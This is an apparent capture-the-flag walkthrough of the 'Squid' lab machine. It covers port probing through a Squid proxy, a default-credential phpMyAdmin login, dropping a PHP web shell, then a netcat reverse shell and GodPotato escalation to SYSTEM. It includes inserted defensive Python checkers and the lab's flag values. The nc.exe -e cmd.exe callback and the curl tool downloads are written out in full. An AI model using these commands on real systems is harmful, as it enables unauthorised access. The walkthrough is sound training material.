Squid
Enumeration:
Port Scanning:
As always I am going to start with nmap to scan all open ports:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.189
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 23:24 EST
Nmap scan report for 192.168.115.189
Host is up, received echo-reply ttl 125 (0.11s latency).
Scanned at 2025-11-09 23:24:36 EST for 129s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3128/tcp open http-proxy syn-ack ttl 125 Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We have SMB running on port 445, some RPC-related ports, and a Squid proxy on port 3128.
Squid is a proxy server that sits between the organization and the internet and provides many features, load balancing among them.
HTTP (3128):
If we browse to that port:

We can use curl to try to reach any open port behind the proxy, in case it is configured improperly.
If it is configured properly, there should be rules that prevent us from reaching those ports or IPs.
Let's test it out:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 192.168.115.189:8080
<!DOCTYPE html>
<html>
<head>
<title>WAMPSERVER Homepage</title>
<meta charset="UTF-8">
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 192.168.115.189:44
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<snipped>
<div id="content">
<p>The following error was encountered while trying to retrieve the URL: <a href="http://192.168.115.189:44/">http://192.168.115.189:44/</a></p>
<blockquote id="error">
<p><b>Access Denied.</b></p>
</blockquote>
<p>Access control configuration prevents your request from being allowed at this time. Please contact your service provider if you feel this is incorrect.</p>
<p>Your cache administrator is <a href="mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_ACCESS_DENIED&body=CacheHost%3A%20SQUID%0D%0AErrPage%3A%20ERR_ACCESS_DENIED%0
D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Mon,%2010%20Nov%202025%2004%3A43%3A58%20GMT%0D%0A%0D%0AClientIP%3A%20192.168.45.176%0D%0A%0D%0AHTTP%20Request%3A%0D%0AGET%20%2F
%20HTTP%2F1.1%0AUser-Agent%3A%20curl%2F8.15.0%0D%0AAccept%3A%20*%2F*%0D%0AProxy-Connection%3A%20Keep-Alive%0D%0AHost%3A%20192.168.115.189%3A44%0D%0A%0D%0A%0D%0A">webmaster
</a>.</p>
We can see that when I tried to access a non-existent port I got Access Denied, but with a valid port we reach it and get the page source.
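The Access Denied page above is produced by Squid's http_access ACLs, and which ports get through is decided by the same rules. As an added example (not part of this writeup and not Squid's own code), here is a small Python linter that reads a squid.conf and reports the settings that let this kind of probing through: a Safe_ports list that covers every high port, and no deny for loopback or internal destinations ahead of the allow rules. Both configurations in it are constructed for the example and modelled on the stock squid.conf defaults (the default Safe_ports list does include 1025-65535, and the deny to_localhost line ships commented out); they are not taken from the target machine.

```python
"""Lint a squid.conf for forward-proxy rules that let clients reach services
on the proxy host itself or on the internal network through the proxy.
Added example, not code from the writeup or the Squid project; both configs
below are constructed, modelled on the stock squid.conf defaults."""
import ipaddress
from dataclasses import dataclass, field

# constructed: mirrors the stock defaults, where 'deny to_localhost' ships commented out
WEAK_CONF = """
acl localnet src 192.168.0.0/16
acl SSL_ports port 443
acl Safe_ports port 80 21 443 70 210 1025-65535 280 488 591 777
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localhost manager
http_access deny manager
#http_access deny to_localhost
http_access allow localnet
http_access allow localhost
http_access deny all
"""

# constructed: narrow Safe_ports, deny loopback and internal destinations before any allow
HARDENED_CONF = """
acl localnet src 192.168.0.0/16
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT
acl internal_dst dst 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 127.0.0.0/8
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localhost manager
http_access deny manager
http_access deny to_localhost
http_access deny internal_dst
http_access allow localnet
http_access allow localhost
http_access deny all
"""

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class Acl:
    name: str
    kind: str
    values: list = field(default_factory=list)


def parse(conf):
    """Collect acl definitions (one name may span several lines) and ordered http_access rules."""
    acls, rules = {}, []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments, so commented-out rules do not count
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl" and len(parts) >= 3:
            acls.setdefault(parts[1], Acl(parts[1], parts[2])).values.extend(parts[3:])
        elif parts[0] == "http_access" and len(parts) >= 3:
            rules.append((parts[1], parts[2:]))
    return acls, rules


def port_count(values):
    """Number of TCP ports an 'acl ... port' list permits, expanding ranges like 1025-65535."""
    total = 0
    for v in values:
        lo, _, hi = v.partition("-")
        total += int(hi) - int(lo) + 1 if hi else 1
    return total


def covers_internal(values):
    """True if any network in a dst ACL overlaps RFC1918 or loopback space."""
    for v in values:
        try:
            net = ipaddress.ip_network(v, strict=False)
        except ValueError:
            continue  # hostnames or domain entries are ignored here
        if any(net.overlaps(n) for n in INTERNAL_NETS):
            return True
    return False


def lint(conf):
    """Return a list of findings; an empty list means the checks passed."""
    acls, rules = parse(conf)
    findings = []
    safe = acls.get("Safe_ports")
    if safe and port_count(safe.values) > 1024:
        findings.append(f"Safe_ports permits {port_count(safe.values)} ports; "
                        "the stock 1025-65535 entry lets clients probe any high port through the proxy")
    # only denies placed before the first general allow (manager rules excluded) actually block
    cutoff = next((i for i, (act, toks) in enumerate(rules)
                   if act == "allow" and "manager" not in toks), len(rules))
    early_denies = [toks for act, toks in rules[:cutoff] if act == "deny"]
    if not any("to_localhost" in toks for toks in early_denies):
        findings.append("no 'http_access deny to_localhost' before the first allow; "
                        "clients can reach services bound to the proxy's loopback")
    denies_internal = any(
        acls[t].kind == "dst" and covers_internal(acls[t].values)
        for toks in early_denies for t in toks if not t.startswith("!") and t in acls)
    if not denies_internal:
        findings.append("no dst ACL denying RFC1918/loopback destinations before the first allow; "
                        "the proxy can be used to reach internal hosts")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, lint(conf) or "OK")
```

To check a live proxy, pass the file contents instead of the embedded strings, e.g. lint(open("/etc/squid/squid.conf").read()). The order check matters because Squid stops at the first http_access line that matches, so a deny placed after allow localnet never fires for local clients.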
I searched online for a way to automate this process and came across this blog:
It mentions a tool called spose, which can automate port scanning behind the Squid proxy:
Clone it:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ git clone https://github.com/aancw/spose.git
Cloning into 'spose'...
remote: Enumerating objects: 34, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 34 (delta 11), reused 17 (delta 6), pack-reused 11 (from 1)
Receiving objects: 100% (34/34), 7.89 KiB | 7.89 MiB/s, done.
Resolving deltas: 100% (11/11), done.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ cd spose
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Squid/spose]
└─$ ls -la
total 36
drwxrwxr-x 3 kali kali 4096 Nov 9 23:42 .
drwxrwxr-x 4 kali kali 4096 Nov 9 23:42 ..
drwxrwxr-x 7 kali kali 4096 Nov 9 23:42 .git
-rw-rw-r-- 1 kali kali 17 Nov 9 23:42 .gitignore
-rw-rw-r-- 1 kali kali 0 Nov 9 23:42 __init__.py
-rw-rw-r-- 1 kali kali 1060 Nov 9 23:42 LICENSE
-rw-rw-r-- 1 kali kali 845 Nov 9 23:42 README.md
-rw-rw-r-- 1 kali kali 9 Nov 9 23:42 requirements.txt
-rw-rw-r-- 1 kali kali 2973 Nov 9 23:42 spose.py
-rw-rw-r-- 1 kali kali 1225 Nov 9 23:42 url_request.py
Run it:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Squid/spose]
└─$ python3 spose.py
usage: spose.py [-h] --proxy PROXY --target TARGET [--ports PORTS] [--allports]
Squid Pivoting Open Port Scanner
options:
-h, --help show this help message and exit
--proxy PROXY Define proxy address URL (http://x.x.x.x:3128)
--target TARGET Define target IP behind proxy
--ports PORTS [Optional] Define target ports behind proxy (comma-separated)
--allports [Optional] Scan all 65535 TCP ports behind proxy
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Squid/spose]
└─$ python3 spose.py --proxy http://192.168.115.189:3128 --target 192.168.115.189
Scanning default common ports
Using proxy address http://192.168.115.189:3128
192.168.115.189:3306 seems OPEN
192.168.115.189:8080 seems OPEN
We find two open ports behind the Squid proxy. If I get stuck I will come back to this and scan all ports.
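What spose does on the client side shows up on the proxy as a burst of requests from one source to many different destination ports, a mix of TCP_DENIED for ports outside Safe_ports and TCP_MISS/503 for ports Squid could not connect to. Added example, not part of the writeup and not spose's code: a Python script that reads Squid's native access.log format and flags that pattern, plus any request whose destination is the proxy host itself or loopback. The log lines are constructed to resemble this scan; the proxy address set and the thresholds are assumptions.

```python
"""Flag port scanning through a Squid forward proxy, and requests aimed at the
proxy host itself, from access.log lines in Squid's native format.
Added example, not code from the writeup or from spose; the log lines are constructed."""
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import urlsplit

# native access.log: time elapsed client code/status bytes method URL ident hierarchy/peer type
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)"
)

# constructed sample: one client sweeping ports on the proxy host, one ordinary client
SAMPLE_LOG = """\
1731130800.101    120 192.168.45.176 TCP_MISS/200 4120 GET http://192.168.115.189:8080/ - HIER_DIRECT/192.168.115.189 text/html
1731130800.402      1 192.168.45.176 TCP_DENIED/403 3890 GET http://192.168.115.189:44/ - HIER_NONE/- text/html
1731130800.655    305 192.168.45.176 TCP_MISS/503 4205 GET http://192.168.115.189:21/ - HIER_DIRECT/192.168.115.189 text/html
1731130800.910      1 192.168.45.176 TCP_DENIED/403 3890 GET http://192.168.115.189:22/ - HIER_NONE/- text/html
1731130801.160      1 192.168.45.176 TCP_DENIED/403 3890 GET http://192.168.115.189:23/ - HIER_NONE/- text/html
1731130801.420      1 192.168.45.176 TCP_DENIED/403 3890 GET http://192.168.115.189:25/ - HIER_NONE/- text/html
1731130801.677    298 192.168.45.176 TCP_MISS/503 4205 GET http://192.168.115.189:80/ - HIER_DIRECT/192.168.115.189 text/html
1731130801.930    301 192.168.45.176 TCP_MISS/503 4205 GET http://192.168.115.189:443/ - HIER_DIRECT/192.168.115.189 text/html
1731130802.188    140 192.168.45.176 TCP_MISS/502 3611 GET http://192.168.115.189:3306/ - HIER_DIRECT/192.168.115.189 text/html
1731130802.440    299 192.168.45.176 TCP_MISS/503 4205 GET http://192.168.115.189:8443/ - HIER_DIRECT/192.168.115.189 text/html
1731130802.701    302 192.168.45.176 TCP_MISS/503 4205 GET http://192.168.115.189:1433/ - HIER_DIRECT/192.168.115.189 text/html
1731130803.005    118 192.168.45.176 TCP_MISS/200 4120 GET http://127.0.0.1:8080/ - HIER_DIRECT/127.0.0.1 text/html
1731130803.260      1 192.168.45.176 TCP_DENIED/403 3890 CONNECT 192.168.115.189:445 - HIER_NONE/- text/html
1731130850.000     87 192.168.10.5 TCP_MISS/200 15320 GET http://example.com/ - HIER_DIRECT/203.0.113.10 text/html
1731130855.120     12 192.168.10.5 TCP_HIT/200 15320 GET http://example.com/about - HIER_NONE/- text/html
"""


def dest_of(method, url):
    """(host, port) of a proxied request: CONNECT carries host:port, other methods a full URL."""
    if method == "CONNECT":
        host, _, port = url.rpartition(":")
        return host, int(port)
    parts = urlsplit(url)
    return parts.hostname, parts.port or (443 if parts.scheme == "https" else 80)


def is_self_target(host, proxy_hosts):
    """True when the destination is the proxy's own address or a loopback address."""
    if host is None:
        return False
    if host in proxy_hosts or host == "localhost":
        return True
    try:
        return ip_address(host).is_loopback
    except ValueError:
        return False


def analyze(log_text, proxy_hosts, port_threshold=10, window_s=60.0):
    """Return alert dicts per client: a sweep of many ports within window_s, or proxy-host targeting."""
    stats = defaultdict(lambda: {"ports": set(), "first": None, "last": None,
                                 "denied": 0, "self_targeted": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another log format
        ts = float(m["ts"])
        host, port = dest_of(m["method"], m["url"])
        s = stats[m["client"]]
        s["ports"].add(port)
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
        if m["code"] == "TCP_DENIED":
            s["denied"] += 1
        if is_self_target(host, proxy_hosts):
            s["self_targeted"].add(f"{host}:{port}")
    alerts = []
    for client, s in sorted(stats.items()):
        span = s["last"] - s["first"]
        if len(s["ports"]) >= port_threshold and span <= window_s:
            alerts.append({"client": client, "kind": "port_scan_via_proxy",
                           "distinct_ports": len(s["ports"]), "denied": s["denied"],
                           "span_s": round(span, 3)})
        if s["self_targeted"]:
            alerts.append({"client": client, "kind": "proxy_host_targeted",
                           "destinations": sorted(s["self_targeted"])})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG, {"192.168.115.189"}):
        print(alert)
```

The denied count is worth keeping in the alert: a legitimate client behind a well-configured proxy almost never trips http_access, so a source with a high TCP_DENIED ratio across distinct ports is a strong signal even below the port threshold.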
We can access that port either through the target's localhost address or through the target IP itself; we get the same result:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 127.0.0.1:8080
<!DOCTYPE html>
<html>
<head>
<title>WAMPSERVER Homepage</title>
<snipped>
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ curl -x 192.168.115.189:3128 192.168.115.189:8080
<!DOCTYPE html>
<html>
<head>
<title>WAMPSERVER Homepage</title>
<snipped>
Now we can configure FoxyProxy to use our Squid proxy, route the browser's traffic through it, and access that port:

Go to extensions, enable the squid profile, then navigate to that port:

As shown in the curl output, we have WampServer running.
Exploitation:
Let's open phpMyAdmin:

We have a login page; I will try default credentials like root:password or root:'' (empty password).
With root as the username and no password, we successfully log in:

Click on the SQL tab to move to it:

Here we can write queries, and the backend MySQL DBMS executes them.
We can inject a simple malicious PHP script that lets us execute code on the underlying operating system, but we need to know the WAMP directory structure so we can place our payload in the right location.
I searched online for the WAMP file structure and got this response from the search engine's integrated AI:

phpMyAdmin usually resides under www, so I will use a query to write a simple PHP script to that directory with a chosen file name:

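A file written into the web root this way is exactly what a baseline check of the web root catches. Added example, not part of the writeup: a Python script that hashes every .php file under a web root, compares against a recorded baseline, and reports files that are new or changed. The directory tree, the baseline and the dropped file are all constructed in a temporary directory to stand in for C:\wamp\www; the file names are assumptions.

```python
"""Report .php files under a web root that are absent from, or differ from, a known-good baseline.
Added example, not part of the writeup; the tree and baseline below are constructed
in a temporary directory to stand in for C:\\wamp\\www."""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path):
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline_tree(root):
    """Map each .php file (path relative to root, forward slashes) to its SHA-256."""
    root = Path(root)
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_of(p)
            for p in root.rglob("*.php") if p.is_file()}


def find_unbaselined(root, baseline):
    """Return (new, modified): .php files not in the baseline, and files whose hash changed."""
    current = baseline_tree(root)
    new = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return new, modified


def demo():
    """Build a constructed web root, take a baseline, then drop and alter files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "phpmyadmin").mkdir()
        (root / "index.php").write_text("<?php echo 'WAMPSERVER Homepage'; ?>")
        (root / "phpmyadmin" / "index.php").write_text("<?php /* constructed stand-in */ ?>")
        baseline = baseline_tree(root)  # in practice, store this at install time
        # constructed: a file written into the web root after the baseline was taken
        (root / "dropped.php").write_text("<?php /* constructed placeholder, not a payload */ ?>")
        # constructed: an existing file edited in place
        (root / "index.php").write_text("<?php echo 'changed'; ?>")
        return find_unbaselined(root, baseline)


if __name__ == "__main__":
    new, modified = demo()
    print("new:", new)
    print("modified:", modified)
```

Run on a schedule against the real web root with a baseline recorded at deployment time; any .php file appearing in a directory that the database account can write to is worth an alert on its own, since the application itself should never be writing PHP there.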
Now let's open that file in the browser and see whether we can execute some code:

Indeed we can. I will set up a netcat listener and get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ... 
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.189] 50201
PS C:\wamp\www>
Post-Exploitation:
PS C:\wamp\www> whoami /all
USER INFORMATION
----------------
User Name SID
========================== ========
nt authority\local service S-1-5-19
<snipped>
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Now that we have a shell, I ran whoami /all and found that we have SeImpersonatePrivilege. I will upload GodPotato, but any similar tool works, such as the other Potatoes or PrintSpoofer.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
PS C:\Users> cd \Windows\Tasks
PS C:\Windows\Tasks> curl http://192.168.45.187/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> curl http://192.168.45.187/nc.exe -o nc.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/9/2025 9:01 PM 57344 GodPotato-NET4.exe
-a---- 11/9/2025 9:01 PM 59392 nc.exe
Start another netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.187 80"
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Squid]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.189] 50207
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\Tasks>whoami
whoami
nt authority\system
Get the flags:
C:\Windows\Tasks>cd \Users
cd \Users
C:\Users>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 5C30-DCD7
C:.
+---Administrator
| +---3D Objects
| +---Contacts
| +---Desktop
| | proof.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| \---Videos
\---Public
+---Documents
+---Downloads
+---Music
+---Pictures
\---Videos
C:\Users>cd Administrator\Desktop
cd Administrator\Desktop
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
ffa444574da43c6b3ce1a3db6885fe13
C:\Users\Administrator\Desktop>type C:\local.txt
type C:\local.txt
7db6da2be3ef5643fc6573993745729d